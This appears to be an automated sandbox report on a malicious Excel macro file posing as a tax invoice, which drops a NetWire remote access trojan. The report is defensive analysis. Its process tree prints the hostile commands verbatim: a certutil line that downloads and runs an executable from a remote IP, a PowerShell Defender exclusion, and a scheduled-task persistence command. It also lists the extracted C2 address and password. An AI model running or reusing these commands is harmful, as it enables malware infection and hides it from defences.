Analysis
-
max time kernel
142s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20220715-en -
resource tags
arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system -
submitted
10-08-2022 17:40
Static task
static1
Behavioral task
behavioral1
Sample
TAX INVOICE 00893.xlsm
Resource
win7-20220715-en
General
-
Target
TAX INVOICE 00893.xlsm
-
Size
42KB
-
MD5
dfd371ebf737c86675d54224482f3bf3
-
SHA1
e84195e5871bfef86c18563ebe7b6ad1077f81e5
-
SHA256
e209b1e1be73d201c0cf316df426fa1e0c2b436acf2d8c269ac6694b936d839e
-
SHA512
994ba3a222532826c82081eb92ecb6d5cd57faf162fbd5e84ec1679fa13def5813b48c0f0b40044adf92a72ea9c6778c66474690635a7d0597e0f7c43b4391f2
Malware Config
Extracted
netwire
194.5.98.126:3378
-
activex_autorun
false
-
copy_executable
false
-
delete_original
false
-
host_id
HostId-%Rand%
-
keylogger_dir
%AppData%\Logs\
-
lock_executable
false
-
offline_keylogger
true
-
password
Pass@2023
-
registry_autorun
false
-
use_mutex
false
Signatures
-
NetWire RAT payload 8 IoCs
Processes:
resource yara_rule behavioral1/memory/1564-86-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/1564-87-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/1564-88-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/1564-90-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/1564-91-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/1564-92-0x000000000040242D-mapping.dmp netwire behavioral1/memory/1564-96-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/1564-98-0x0000000000400000-0x0000000000433000-memory.dmp netwire -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1728 904 cmd.exe EXCEL.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
Aqrmdtmrohibrqzfihirniu.exe.exeAqrmdtmrohibrqzfihirniu.exe.exeAqrmdtmrohibrqzfihirniu.exe.exepid process 564 Aqrmdtmrohibrqzfihirniu.exe.exe 688 Aqrmdtmrohibrqzfihirniu.exe.exe 1564 Aqrmdtmrohibrqzfihirniu.exe.exe -
Loads dropped DLL 2 IoCs
Processes:
cmd.exepid process 1728 cmd.exe 1728 cmd.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Aqrmdtmrohibrqzfihirniu.exe.exedescription pid process target process PID 564 set thread context of 1564 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
EXCEL.EXEdescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE -
Modifies registry class 64 IoCs
Processes:
EXCEL.EXEdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 904 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
Aqrmdtmrohibrqzfihirniu.exe.exepowershell.exepid process 564 Aqrmdtmrohibrqzfihirniu.exe.exe 564 Aqrmdtmrohibrqzfihirniu.exe.exe 1528 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Aqrmdtmrohibrqzfihirniu.exe.exepowershell.exedescription pid process Token: SeDebugPrivilege 564 Aqrmdtmrohibrqzfihirniu.exe.exe Token: SeDebugPrivilege 1528 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid process 904 EXCEL.EXE 904 EXCEL.EXE 904 EXCEL.EXE -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
EXCEL.EXEcmd.exeAqrmdtmrohibrqzfihirniu.exe.exedescription pid process target process PID 904 wrote to memory of 1728 904 EXCEL.EXE cmd.exe PID 904 wrote to memory of 1728 904 EXCEL.EXE cmd.exe PID 904 wrote to memory of 1728 904 EXCEL.EXE cmd.exe PID 904 wrote to memory of 1728 904 EXCEL.EXE cmd.exe PID 1728 wrote to memory of 964 1728 cmd.exe certutil.exe PID 1728 wrote to memory of 964 1728 cmd.exe certutil.exe PID 1728 wrote to memory of 964 1728 cmd.exe certutil.exe PID 1728 wrote to memory of 964 1728 cmd.exe certutil.exe PID 1728 wrote to memory of 564 1728 cmd.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 1728 wrote to memory of 564 1728 cmd.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 1728 wrote to memory of 564 1728 cmd.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 1728 wrote to memory of 564 1728 cmd.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 1528 564 Aqrmdtmrohibrqzfihirniu.exe.exe powershell.exe PID 564 wrote to memory of 1528 564 Aqrmdtmrohibrqzfihirniu.exe.exe powershell.exe PID 564 wrote to memory of 1528 564 Aqrmdtmrohibrqzfihirniu.exe.exe powershell.exe PID 564 wrote to memory of 1528 564 Aqrmdtmrohibrqzfihirniu.exe.exe powershell.exe PID 564 wrote to memory of 1296 564 Aqrmdtmrohibrqzfihirniu.exe.exe schtasks.exe PID 564 wrote to memory of 1296 564 Aqrmdtmrohibrqzfihirniu.exe.exe schtasks.exe PID 564 wrote to memory of 1296 564 Aqrmdtmrohibrqzfihirniu.exe.exe schtasks.exe PID 564 wrote to memory of 1296 564 Aqrmdtmrohibrqzfihirniu.exe.exe schtasks.exe PID 564 wrote to memory of 688 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 688 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 688 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 688 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 1564 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 1564 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 1564 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 1564 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 1564 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 1564 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 1564 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 1564 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 1564 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 1564 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 1564 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 564 wrote to memory of 1564 564 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\TAX INVOICE 00893.xlsm"1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\SysWOW64\cmd.execmd /c certutil.exe -urlcache -split -f "http://192.3.194.246/ecst.exe" Aqrmdtmrohibrqzfihirniu.exe.exe && Aqrmdtmrohibrqzfihirniu.exe.exe2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\SysWOW64\certutil.execertutil.exe -urlcache -split -f "http://192.3.194.246/ecst.exe" Aqrmdtmrohibrqzfihirniu.exe.exe3⤵PID:964
-
C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exeAqrmdtmrohibrqzfihirniu.exe.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\TmbJbrgFWL.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmbJbrgFWL" /XML "C:\Users\Admin\AppData\Local\Temp\tmp40.tmp"4⤵
- Creates scheduled task(s)
PID:1296 -
C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe"C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe"4⤵
- Executes dropped EXE
PID:688 -
C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe"C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe"4⤵
- Executes dropped EXE
PID:1564
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b3643a1880f375bf8e3e7f0492a02f65
SHA1c2f1424b7979e602dd8abcb1efa04b1a9eb1fc13
SHA25617f2091daaabed349ea7979d90091e0d2622d4f96e03921e82315dbcb6e7a4a1
SHA51288c118ffc5744e64c0bfe3c2c03886e791a7baa1bd57e8671cefcab0e3656981cb2c111060af1bbef1c268e3f17b18cde4100a57aae8fbebc6b29945dcc43c6b
-
Filesize
642KB
MD5f9322ac00bfcc0cfce12ed4fb88d0aa1
SHA161d94897a267d53d3f3e3399345c4ecc7918295d
SHA256e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7
SHA512202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1
-
Filesize
642KB
MD5f9322ac00bfcc0cfce12ed4fb88d0aa1
SHA161d94897a267d53d3f3e3399345c4ecc7918295d
SHA256e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7
SHA512202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1
-
Filesize
642KB
MD5f9322ac00bfcc0cfce12ed4fb88d0aa1
SHA161d94897a267d53d3f3e3399345c4ecc7918295d
SHA256e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7
SHA512202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1
-
Filesize
642KB
MD5f9322ac00bfcc0cfce12ed4fb88d0aa1
SHA161d94897a267d53d3f3e3399345c4ecc7918295d
SHA256e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7
SHA512202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1
-
Filesize
642KB
MD5f9322ac00bfcc0cfce12ed4fb88d0aa1
SHA161d94897a267d53d3f3e3399345c4ecc7918295d
SHA256e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7
SHA512202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1
-
Filesize
642KB
MD5f9322ac00bfcc0cfce12ed4fb88d0aa1
SHA161d94897a267d53d3f3e3399345c4ecc7918295d
SHA256e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7
SHA512202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1